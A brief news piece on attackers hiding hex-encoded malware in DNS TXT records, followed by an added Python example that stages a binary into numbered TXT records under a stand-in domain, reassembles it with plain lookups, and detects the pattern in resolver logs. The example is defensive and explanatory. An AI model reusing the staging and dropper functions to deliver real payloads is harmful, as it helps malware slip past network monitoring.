Hackers Are Finding New Ways to Hide Malware in DNS Records
Briefly

Attackers are abusing domain name system (DNS) records to hide malware, letting a malicious script fetch a binary without tripping antivirus tools: DNS traffic usually receives far less scrutiny than web and email traffic. Recent research found TXT records being used to store chunks of malicious files. Each binary is hex-encoded, split into chunks, and spread across multiple subdomains, so the attacker reconstructs it with a series of innocuous-looking DNS requests. As encrypted DNS protocols such as DNS over HTTPS (DoH) and DNS over TLS (DoT) become more common, those queries are no longer visible on the wire, and detection and monitoring will become harder for defenders.
Researchers from DomainTools recently identified a method where attackers use DNS records to hide malicious binaries, making them difficult for security tools to detect.
Malicious scripts can use ordinary DNS lookups to fetch those binaries without triggering antivirus software, because DNS traffic is largely unmonitored compared to web and email traffic.
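To make the technique concrete, here is an added example (not DomainTools' or WIRED's code) that models both sides of it: the staging step, which hex-encodes a binary and publishes each chunk as the TXT record of a numbered subdomain; the dropper step, which walks those names with plain TXT lookups and hex-decodes the result; and a detection heuristic a defender could run over resolver logs. The domain `stage.example.test`, the payload bytes, the log line format and the benign SPF/DMARC lines are all constructed for this example and are not taken from the research. Everything runs offline against an in-memory zone.

```python
import re
from collections import defaultdict

# Hypothetical attacker-controlled zone used throughout; not from the research.
DOMAIN = "stage.example.test"
TXT_STRING_MAX = 255  # one <character-string> in TXT RDATA holds at most 255 bytes


def stage_in_txt(blob: bytes, domain: str, chunk_size: int = TXT_STRING_MAX) -> dict:
    """Attacker side: hex-encode the binary, split it into TXT-sized chunks and
    publish chunk i as the TXT record of '<i>.<domain>'. Returns the zone as
    {fqdn: txt_value}. Hex doubles the size, so a 1 MiB binary needs over 8,000 records."""
    hexdata = blob.hex()
    chunks = [hexdata[i:i + chunk_size] for i in range(0, len(hexdata), chunk_size)]
    return {f"{i}.{domain}": chunk for i, chunk in enumerate(chunks)}


def fetch_from_txt(domain: str, resolve_txt) -> bytes:
    """Dropper side: query 0.<domain>, 1.<domain>, ... until a name has no TXT
    record (resolve_txt returns None), then hex-decode the concatenation.
    Every request is an ordinary TXT lookup; nothing touches HTTP or SMTP."""
    parts = []
    i = 0
    while (txt := resolve_txt(f"{i}.{domain}")) is not None:
        parts.append(txt)
        i += 1
    return bytes.fromhex("".join(parts))


HEX_ONLY = re.compile(r"^[0-9a-f]+$", re.IGNORECASE)
NUMBERED = re.compile(r"^(\d+)\.(.+)$")


def is_hex_payload(txt: str, min_len: int = 8) -> bool:
    """SPF, DKIM, DMARC and site-verification TXT records contain '=', ';' or
    spaces; a string of nothing but hex digits is what an encoded chunk looks like.
    The per-record filter is deliberately loose (a short final chunk must still
    count); the sequence check in detect_txt_staging does the real work."""
    return len(txt) >= min_len and HEX_ONLY.match(txt) is not None


def detect_txt_staging(log_lines, min_chunks: int = 5) -> list:
    """Defender side: scan resolver log lines of the constructed form
    '<ts> <client> <qname> <qtype> <answer>' and flag any client that pulled
    at least min_chunks hex-only TXT answers from contiguously numbered labels
    under one parent name. Returns one alert dict per (client, parent)."""
    seen = defaultdict(dict)  # (client, parent) -> {label index: chunk}
    for line in log_lines:
        fields = line.split(None, 4)
        if len(fields) < 5:
            continue
        _ts, client, qname, qtype, answer = fields
        m = NUMBERED.match(qname.rstrip("."))
        if qtype != "TXT" or m is None:
            continue
        txt = answer.strip().strip('"')
        if is_hex_payload(txt):
            seen[(client, m.group(2))][int(m.group(1))] = txt
    alerts = []
    for (client, parent), chunks in seen.items():
        idx = sorted(chunks)
        contiguous = idx == list(range(idx[0], idx[0] + len(idx)))
        if len(idx) >= min_chunks and contiguous:
            alerts.append({"client": client, "parent": parent, "chunks": len(idx),
                           "decoded_bytes": sum(len(c) for c in chunks.values()) // 2})
    return alerts


# Constructed sample payload (not real malware): an MZ-like prefix plus filler.
PAYLOAD = b"MZ\x90\x00" + bytes(range(256)) * 3  # 772 bytes -> 1544 hex chars -> 7 chunks
ZONE = stage_in_txt(PAYLOAD, DOMAIN)

# Constructed resolver log: the dropper's pulls after some benign TXT traffic.
SAMPLE_LOG = [
    '2025-07-15T10:00:00Z 10.0.0.7 example.com. TXT "v=spf1 include:_spf.example.com -all"',
    '2025-07-15T10:00:01Z 10.0.0.7 _dmarc.example.com. TXT "v=DMARC1; p=reject"',
] + [
    f'2025-07-15T10:00:{2 + i:02d}Z 10.0.0.42 {name}. TXT "{txt}"'
    for i, (name, txt) in enumerate(ZONE.items())
]

if __name__ == "__main__":
    recovered = fetch_from_txt(DOMAIN, ZONE.get)  # dict.get returns None = no record
    print(f"{len(ZONE)} TXT records, reassembled {len(recovered)} bytes, "
          f"intact={recovered == PAYLOAD}")
    for alert in detect_txt_staging(SAMPLE_LOG):
        print("ALERT", alert)
```

The detector keys on structure rather than content: numbered labels under one parent, answers that are pure hex, and a contiguous run of them from a single client. That is what survives when the payload is re-encoded, but it only works while the resolver's query log is visible to you; once the dropper uses DoH or DoT to an external resolver, the same logic has to run on the endpoint or on the resolver it actually talks to.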
Read at WIRED